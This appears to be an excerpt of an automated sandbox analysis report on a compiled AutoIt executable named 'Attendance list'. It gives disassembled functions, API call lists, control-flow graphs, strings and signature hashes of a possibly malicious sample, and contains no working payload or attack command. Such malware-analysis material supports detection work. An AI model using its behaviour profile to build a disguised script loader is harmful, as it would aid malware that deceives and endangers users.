                        • This is a third-party compiled AutoIt script., xrefs: 008FD4B4
                        • runas, xrefs: 008FD575
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                        • String ID: This is a third-party compiled AutoIt script.$runas
                        • API String ID: 529118366-3287110873
                        • Opcode ID: 3dfc08d7dff28294e524914f54a51428eaef268155ea224de44f613c2a6432da
                        • Instruction ID: d59256d2084f011a0ef3643437f24ad4c61e889b5b6307b530257b61a699039c
                        • Opcode Fuzzy Hash: 3dfc08d7dff28294e524914f54a51428eaef268155ea224de44f613c2a6432da
                        • Instruction Fuzzy Hash: 40510931908249AECF11ABB8DC15FFD7B75FB45304F0081ADF561EA261DA74C646DB22
                        Function 008C4AFE Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 996 8c4afe-8c4b5e call 8c77c7 GetVersionExW call 8c7d2c 1001 8c4c69-8c4c6b 996->1001 1002 8c4b64 996->1002 1003 8fdb90-8fdb9c 1001->1003 1004 8c4b67-8c4b6c 1002->1004 1005 8fdb9d-8fdba1 1003->1005 1006 8c4c70-8c4c71 1004->1006 1007 8c4b72 1004->1007 1009 8fdba4-8fdbb0 1005->1009 1010 8fdba3 1005->1010 1008 8c4b73-8c4baa call 8c7e8c call 8c7886 1006->1008 1007->1008 1018 8fdc8d-8fdc90 1008->1018 1019 8c4bb0-8c4bb1 1008->1019 1009->1005 1012 8fdbb2-8fdbb7 1009->1012 1010->1009 1012->1004 1014 8fdbbd-8fdbc4 1012->1014 1014->1003 1016 8fdbc6 1014->1016 1020 8fdbcb-8fdbce 1016->1020 1021 8fdca9-8fdcad 1018->1021 1022 8fdc92 1018->1022 1019->1020 1023 8c4bb7-8c4bc2 1019->1023 1024 8fdbd4-8fdbf2 1020->1024 1025 8c4bf1-8c4c08 GetCurrentProcess IsWow64Process 1020->1025 1030 8fdcaf-8fdcb8 1021->1030 1031 8fdc98-8fdca1 1021->1031 1026 8fdc95 1022->1026 1027 8c4bc8-8c4bca 1023->1027 1028 8fdc13-8fdc19 1023->1028 1024->1025 1029 8fdbf8-8fdbfe 1024->1029 1032 8c4c0d-8c4c1e 1025->1032 1033 8c4c0a 1025->1033 1026->1031 1034 8fdc2e-8fdc3a 1027->1034 1035 8c4bd0-8c4bd3 1027->1035 1038 8fdc1b-8fdc1e 1028->1038 1039 8fdc23-8fdc29 1028->1039 1036 8fdc08-8fdc0e 1029->1036 1037 8fdc00-8fdc03 1029->1037 1030->1026 1040 8fdcba-8fdcbd 1030->1040 1031->1021 1041 8c4c89-8c4c93 GetSystemInfo 1032->1041 1042 8c4c20-8c4c30 call 8c4c95 1032->1042 1033->1032 1046 8fdc3c-8fdc3f 1034->1046 1047 8fdc44-8fdc4a 1034->1047 1043 8fdc5a-8fdc5d 1035->1043 1044 8c4bd9-8c4be8 1035->1044 1036->1025 1037->1025 1038->1025 1039->1025 1040->1031 1045 8c4c56-8c4c66 1041->1045 1055 8c4c7d-8c4c87 GetSystemInfo 1042->1055 1056 8c4c32-8c4c3f call 8c4c95 1042->1056 1043->1025 1049 8fdc63-8fdc78 1043->1049 1050 8fdc4f-8fdc55 1044->1050 1051 8c4bee 1044->1051 1046->1025 1047->1025 1053 8fdc7a-8fdc7d 1049->1053 1054 8fdc82-8fdc88 1049->1054 1050->1025 1051->1025 1053->1025 1054->1025 1058 8c4c47-8c4c4b 1055->1058 1061 8c4c76-8c4c7b 1056->1061 1062 8c4c41-8c4c45 GetNativeSystemInfo 1056->1062 1058->1045 1060 8c4c4d-8c4c50 FreeLibrary 1058->1060 1060->1045 1061->1062 1062->1058
                        APIs
                        • GetVersionExW.KERNEL32(?), ref: 008C4B2B
                          • Part of subcall function 008C7D2C: _memmove.LIBCMT ref: 008C7D66
                        • GetCurrentProcess.KERNEL32(?,0094FAEC,00000000,00000000,?), ref: 008C4BF8
                        • IsWow64Process.KERNEL32(00000000), ref: 008C4BFF
                        • GetNativeSystemInfo.KERNELBASE(00000000), ref: 008C4C45
                        • FreeLibrary.KERNEL32(00000000), ref: 008C4C50
                        • GetSystemInfo.KERNEL32(00000000), ref: 008C4C81
                        • GetSystemInfo.KERNEL32(00000000), ref: 008C4C8D
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                        • String ID:
                        • API String ID: 1986165174-0
                        • Opcode ID: 94dcbab13e32b1e59a0cb9bfc08a3aff216f76511d18dcd28a03cb4eb208c538
                        • Instruction ID: afa85d7ad87735c882f60e840fbd2a275520d4669aad9daaec5e064c9ab03e95
                        • Opcode Fuzzy Hash: 94dcbab13e32b1e59a0cb9bfc08a3aff216f76511d18dcd28a03cb4eb208c538
                        • Instruction Fuzzy Hash: AB91C33154A7C8DEC731DB788461AAABFF5FF2A310B54599DD1CAC3A01D230E948D72A
                        Function 008C4FE9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1063 8c4fe9-8c5001 CreateStreamOnHGlobal 1064 8c5021-8c5026 1063->1064 1065 8c5003-8c501a FindResourceExW 1063->1065 1066 8fdd5c-8fdd6b LoadResource 1065->1066 1067 8c5020 1065->1067 1066->1067 1068 8fdd71-8fdd7f SizeofResource 1066->1068 1067->1064 1068->1067 1069 8fdd85-8fdd90 LockResource 1068->1069 1069->1067 1070 8fdd96-8fddb4 1069->1070 1070->1067
                        APIs
                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,008C4EEE,?,?,00000000,00000000), ref: 008C4FF9
                        • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,008C4EEE,?,?,00000000,00000000), ref: 008C5010
                        • LoadResource.KERNEL32(?,00000000,?,?,008C4EEE,?,?,00000000,00000000,?,?,?,?,?,?,008C4F8F), ref: 008FDD60
                        • SizeofResource.KERNEL32(?,00000000,?,?,008C4EEE,?,?,00000000,00000000,?,?,?,?,?,?,008C4F8F), ref: 008FDD75
                        • LockResource.KERNEL32(008C4EEE,?,?,008C4EEE,?,?,00000000,00000000,?,?,?,?,?,?,008C4F8F,00000000), ref: 008FDD88
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                        • String ID: SCRIPT
                        • API String ID: 3051347437-3967369404
                        • Opcode ID: bf2ffe1e9b4e9d276c0de063d0fd97712189d78c18acdacb3dd30dc28ceadc48
                        • Instruction ID: 55b4db502bd77fd8078c3313c4549a0d6b6b8f2062e24f8fa50d03e8747fa18f
                        • Opcode Fuzzy Hash: bf2ffe1e9b4e9d276c0de063d0fd97712189d78c18acdacb3dd30dc28ceadc48
                        • Instruction Fuzzy Hash: 80115A75200B02AFDB218B65DC68F677BB9FBCAB51F20416CF516C6260DBB1E8409660
                        Function 00924696 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                        Download Yara Rule
                        APIs
                        • GetFileAttributesW.KERNELBASE(?,008FE7C1), ref: 009246A6
                        • FindFirstFileW.KERNELBASE(?,?), ref: 009246B7
                        • FindClose.KERNEL32(00000000), ref: 009246C7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: FileFind$AttributesCloseFirst
                        • String ID:
                        • API String ID: 48322524-0
                        • Opcode ID: a121a1b8f60da461c23f59ad337928d478e2031b384e72f6ec14d2d7d96f0314
                        • Instruction ID: fbf6e8112f636312c08620e3faff1d2232d0beed7207fb96c9e215a0e8e4e6f5
                        • Opcode Fuzzy Hash: a121a1b8f60da461c23f59ad337928d478e2031b384e72f6ec14d2d7d96f0314
                        • Instruction Fuzzy Hash: 57E0D8364244119B42106738FC5D8EA775C9E07379F100715F935C10E0E7B059509595
                        Function 008CE800 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON
                        Download Yara Rule
                        Strings
                        • Variable must be of type 'Object'., xrefs: 0090428C
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID:
                        • String ID: Variable must be of type 'Object'.
                        • API String ID: 0-109567571
                        • Opcode ID: 6f4a35ceb59cf562625a3e654521f39351a3a8e6eb1e31c96d0462688ea28c92
                        • Instruction ID: 28b899b8c8544577d768f4bd782c877035429e22c85c5d7889b60719cde0dfaf
                        • Opcode Fuzzy Hash: 6f4a35ceb59cf562625a3e654521f39351a3a8e6eb1e31c96d0462688ea28c92
                        • Instruction Fuzzy Hash: 01A26875A04219CFDB24CF98C480FA9B7B2FB58314F24846DEA16AB352D735ED42CB81
                        Function 008D0B30 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON
                        Download Yara Rule
                        APIs
                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008D0BBB
                        • timeGetTime.WINMM ref: 008D0E76
                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008D0FB3
                        • TranslateMessage.USER32(?), ref: 008D0FC7
                        • DispatchMessageW.USER32(?), ref: 008D0FD5
                        • Sleep.KERNEL32(0000000A), ref: 008D0FDF
                        • LockWindowUpdate.USER32(00000000,?,?), ref: 008D105A
                        • DestroyWindow.USER32 ref: 008D1066
                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 008D1080
                        • Sleep.KERNEL32(0000000A,?,?), ref: 009052AD
                        • TranslateMessage.USER32(?), ref: 0090608A
                        • DispatchMessageW.USER32(?), ref: 00906098
                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 009060AC
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
                        • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                        • API String ID: 4003667617-3242690629
                        • Opcode ID: f8989dfa16b52ae1b4d7701b1e1e3aeb50fded2803e476c15ae22a9a88254f00
                        • Instruction ID: f7c7e5dff98061a5306c415ae85fa5009ee0a292528e055107658149d6c4f779
                        • Opcode Fuzzy Hash: f8989dfa16b52ae1b4d7701b1e1e3aeb50fded2803e476c15ae22a9a88254f00
                        • Instruction Fuzzy Hash: B7B29C70608741DFDB24DB24C884BAAB7E5FF85304F154A1EE49AC72A1DB75E884DF82
                        Function 009293DF Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                          • Part of subcall function 009291E9: __time64.LIBCMT ref: 009291F3
                          • Part of subcall function 008C5045: _fseek.LIBCMT ref: 008C505D
                        • __wsplitpath.LIBCMT ref: 009294BE
                          • Part of subcall function 008E432E: __wsplitpath_helper.LIBCMT ref: 008E436E
                        • _wcscpy.LIBCMT ref: 009294D1
                        • _wcscat.LIBCMT ref: 009294E4
                        • __wsplitpath.LIBCMT ref: 00929509
                        • _wcscat.LIBCMT ref: 0092951F
                        • _wcscat.LIBCMT ref: 00929532
                          • Part of subcall function 0092922F: _memmove.LIBCMT ref: 00929268
                          • Part of subcall function 0092922F: _memmove.LIBCMT ref: 00929277
                        • _wcscmp.LIBCMT ref: 00929479
                          • Part of subcall function 009299BE: _wcscmp.LIBCMT ref: 00929AAE
                          • Part of subcall function 009299BE: _wcscmp.LIBCMT ref: 00929AC1
                        • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 009296DC
                        • _wcsncpy.LIBCMT ref: 0092974F
                        • DeleteFileW.KERNEL32(?,?), ref: 00929785
                        • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0092979B
                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 009297AC
                        • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 009297BE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                        • String ID:
                        • API String ID: 1500180987-0
                        • Opcode ID: 08a2c8ddb4f690d3b47e476e18643c0aa806529a48aa23eb1deca5dd677db8fc
                        • Instruction ID: 78ad0c1dd8d96374ee557c39900e2b1c3f3ca9d7925d8d4f90fc287f7d55e993
                        • Opcode Fuzzy Hash: 08a2c8ddb4f690d3b47e476e18643c0aa806529a48aa23eb1deca5dd677db8fc
                        • Instruction Fuzzy Hash: E1C14BB1D00229AADF21DFA9DC85EDEB7BDEF45300F0040AAF609E7155DB709A848F65
                        Function 008C3015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 71windowregistryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • GetSysColorBrush.USER32(0000000F), ref: 008C3074
                        • RegisterClassExW.USER32(00000030), ref: 008C309E
                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008C30AF
                        • InitCommonControlsEx.COMCTL32(?), ref: 008C30CC
                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008C30DC
                        • LoadIconW.USER32(000000A9), ref: 008C30F2
                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 008C3101
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                        • API String ID: 2914291525-1005189915
                        • Opcode ID: 2ebac77abdb18377da82352852032e384787209d8a124e9e58cfdef3098233d1
                        • Instruction ID: 9f76ff18deb6587da76b954083d96f028d7f4aeab3e37613017a7a50d227fcc6
                        • Opcode Fuzzy Hash: 2ebac77abdb18377da82352852032e384787209d8a124e9e58cfdef3098233d1
                        • Instruction Fuzzy Hash: E0314A7586930AEFDB10CFA4D888BD9BBF4FF09310F10456AE550EA2A0D3B90545DF51
                        Function 008C3041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • GetSysColorBrush.USER32(0000000F), ref: 008C3074
                        • RegisterClassExW.USER32(00000030), ref: 008C309E
                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008C30AF
                        • InitCommonControlsEx.COMCTL32(?), ref: 008C30CC
                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008C30DC
                        • LoadIconW.USER32(000000A9), ref: 008C30F2
                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 008C3101
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                        • API String ID: 2914291525-1005189915
                        • Opcode ID: 2d6934e07a89f58742e65421e1f0fe5df2ff04da4b13c27f75fa46cebc35a48f
                        • Instruction ID: 2c3888a0b0819b1412feab5421388d9e85cc5422ef950c673b3ac6316d62ab03
                        • Opcode Fuzzy Hash: 2d6934e07a89f58742e65421e1f0fe5df2ff04da4b13c27f75fa46cebc35a48f
                        • Instruction Fuzzy Hash: FB21E5B5965209AFDB00DFA4E888B9DBBF4FB09700F00412AF514EA3A0D7B54544AF91
                        Function 008C71EB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                          • Part of subcall function 008C4864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,009862F8,?,008C37C0,?), ref: 008C4882
                          • Part of subcall function 008E074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,008C72C5), ref: 008E0771
                        • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 008C7308
                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 008FECF1
                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 008FED32
                        • RegCloseKey.ADVAPI32(?), ref: 008FED70
                        • _wcscat.LIBCMT ref: 008FEDC9
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                        • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                        • API String ID: 2673923337-2727554177
                        • Opcode ID: 1cbc025cb9567bbc977ad8d4859c2f495916ef937f1dd26977631ee882fa023c
                        • Instruction ID: f22b2b2383d66de52f8a83cb437485fe9aaf8a0135036499edbde34d18d8a058
                        • Opcode Fuzzy Hash: 1cbc025cb9567bbc977ad8d4859c2f495916ef937f1dd26977631ee882fa023c
                        • Instruction Fuzzy Hash: FE71597101C3059AC714EFA9EC81DABBBF8FB85350B50492EF565C32A1EB30D948DB62
                        Function 008C3A58 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • GetSysColorBrush.USER32(0000000F), ref: 008C3A62
                        • LoadCursorW.USER32(00000000,00007F00), ref: 008C3A71
                        • LoadIconW.USER32(00000063), ref: 008C3A88
                        • LoadIconW.USER32(000000A4), ref: 008C3A9A
                        • LoadIconW.USER32(000000A2), ref: 008C3AAC
                        • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 008C3AD2
                        • RegisterClassExW.USER32(?), ref: 008C3B28
                          • Part of subcall function 008C3041: GetSysColorBrush.USER32(0000000F), ref: 008C3074
                          • Part of subcall function 008C3041: RegisterClassExW.USER32(00000030), ref: 008C309E
                          • Part of subcall function 008C3041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008C30AF
                          • Part of subcall function 008C3041: InitCommonControlsEx.COMCTL32(?), ref: 008C30CC
                          • Part of subcall function 008C3041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008C30DC
                          • Part of subcall function 008C3041: LoadIconW.USER32(000000A9), ref: 008C30F2
                          • Part of subcall function 008C3041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 008C3101
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                        • String ID: #$0$AutoIt v3
                        • API String ID: 423443420-4155596026
                        • Opcode ID: 642c5b2e91e8a74dee974619cab70ec4be5efc291c798320be63d8acc0ba70d1
                        • Instruction ID: 2c4c7787e2632b943b5192d2a169d035ac6f864bdcf7723135cc2d98858b91ac
                        • Opcode Fuzzy Hash: 642c5b2e91e8a74dee974619cab70ec4be5efc291c798320be63d8acc0ba70d1
                        • Instruction Fuzzy Hash: 0F216D70928308AFEB109FA4EC09F9D7BB4FB08710F004169E510EA3A0C3B95654AF84
                        Function 008C3633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 767 8c3633-8c3681 769 8c36e1-8c36e3 767->769 770 8c3683-8c3686 767->770 769->770 773 8c36e5 769->773 771 8c3688-8c368f 770->771 772 8c36e7 770->772 774 8c375d-8c3765 PostQuitMessage 771->774 775 8c3695-8c369a 771->775 777 8c36ed-8c36f0 772->777 778 8fd31c-8fd34a call 8d11d0 call 8d11f3 772->778 776 8c36ca-8c36d2 DefWindowProcW 773->776 785 8c3711-8c3713 774->785 781 8fd38f-8fd3a3 call 922a16 775->781 782 8c36a0-8c36a2 775->782 784 8c36d8-8c36de 776->784 779 8c3715-8c373c SetTimer RegisterWindowMessageW 777->779 780 8c36f2-8c36f3 777->780 814 8fd34f-8fd356 778->814 779->785 788 8c373e-8c3749 CreatePopupMenu 779->788 786 8fd2bf-8fd2c2 780->786 787 8c36f9-8c370c KillTimer call 8c44cb call 8c3114 780->787 781->785 807 8fd3a9 781->807 789 8c36a8-8c36ad 782->789 790 8c3767-8c3776 call 8c4531 782->790 785->784 793 8fd2f8-8fd317 MoveWindow 786->793 794 8fd2c4-8fd2c6 786->794 787->785 788->785 796 8fd374-8fd37b 789->796 797 8c36b3-8c36b8 789->797 790->785 793->785 801 8fd2c8-8fd2cb 794->801 802 8fd2e7-8fd2f3 SetFocus 794->802 796->776 804 8fd381-8fd38a call 91817e 796->804 805 8c36be-8c36c4 797->805 806 8c374b-8c375b call 8c45df 797->806 801->805 810 8fd2d1-8fd2e2 call 8d11d0 801->810 802->785 804->776 805->776 805->814 806->785 807->776 810->785 814->776 818 8fd35c-8fd36f call 8c44cb call 8c43db 814->818 818->776
                        APIs
                        • DefWindowProcW.USER32(?,?,?,?), ref: 008C36D2
                        • KillTimer.USER32(?,00000001), ref: 008C36FC
                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 008C371F
                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008C372A
                        • CreatePopupMenu.USER32 ref: 008C373E
                        • PostQuitMessage.USER32(00000000), ref: 008C375F
                        Strings
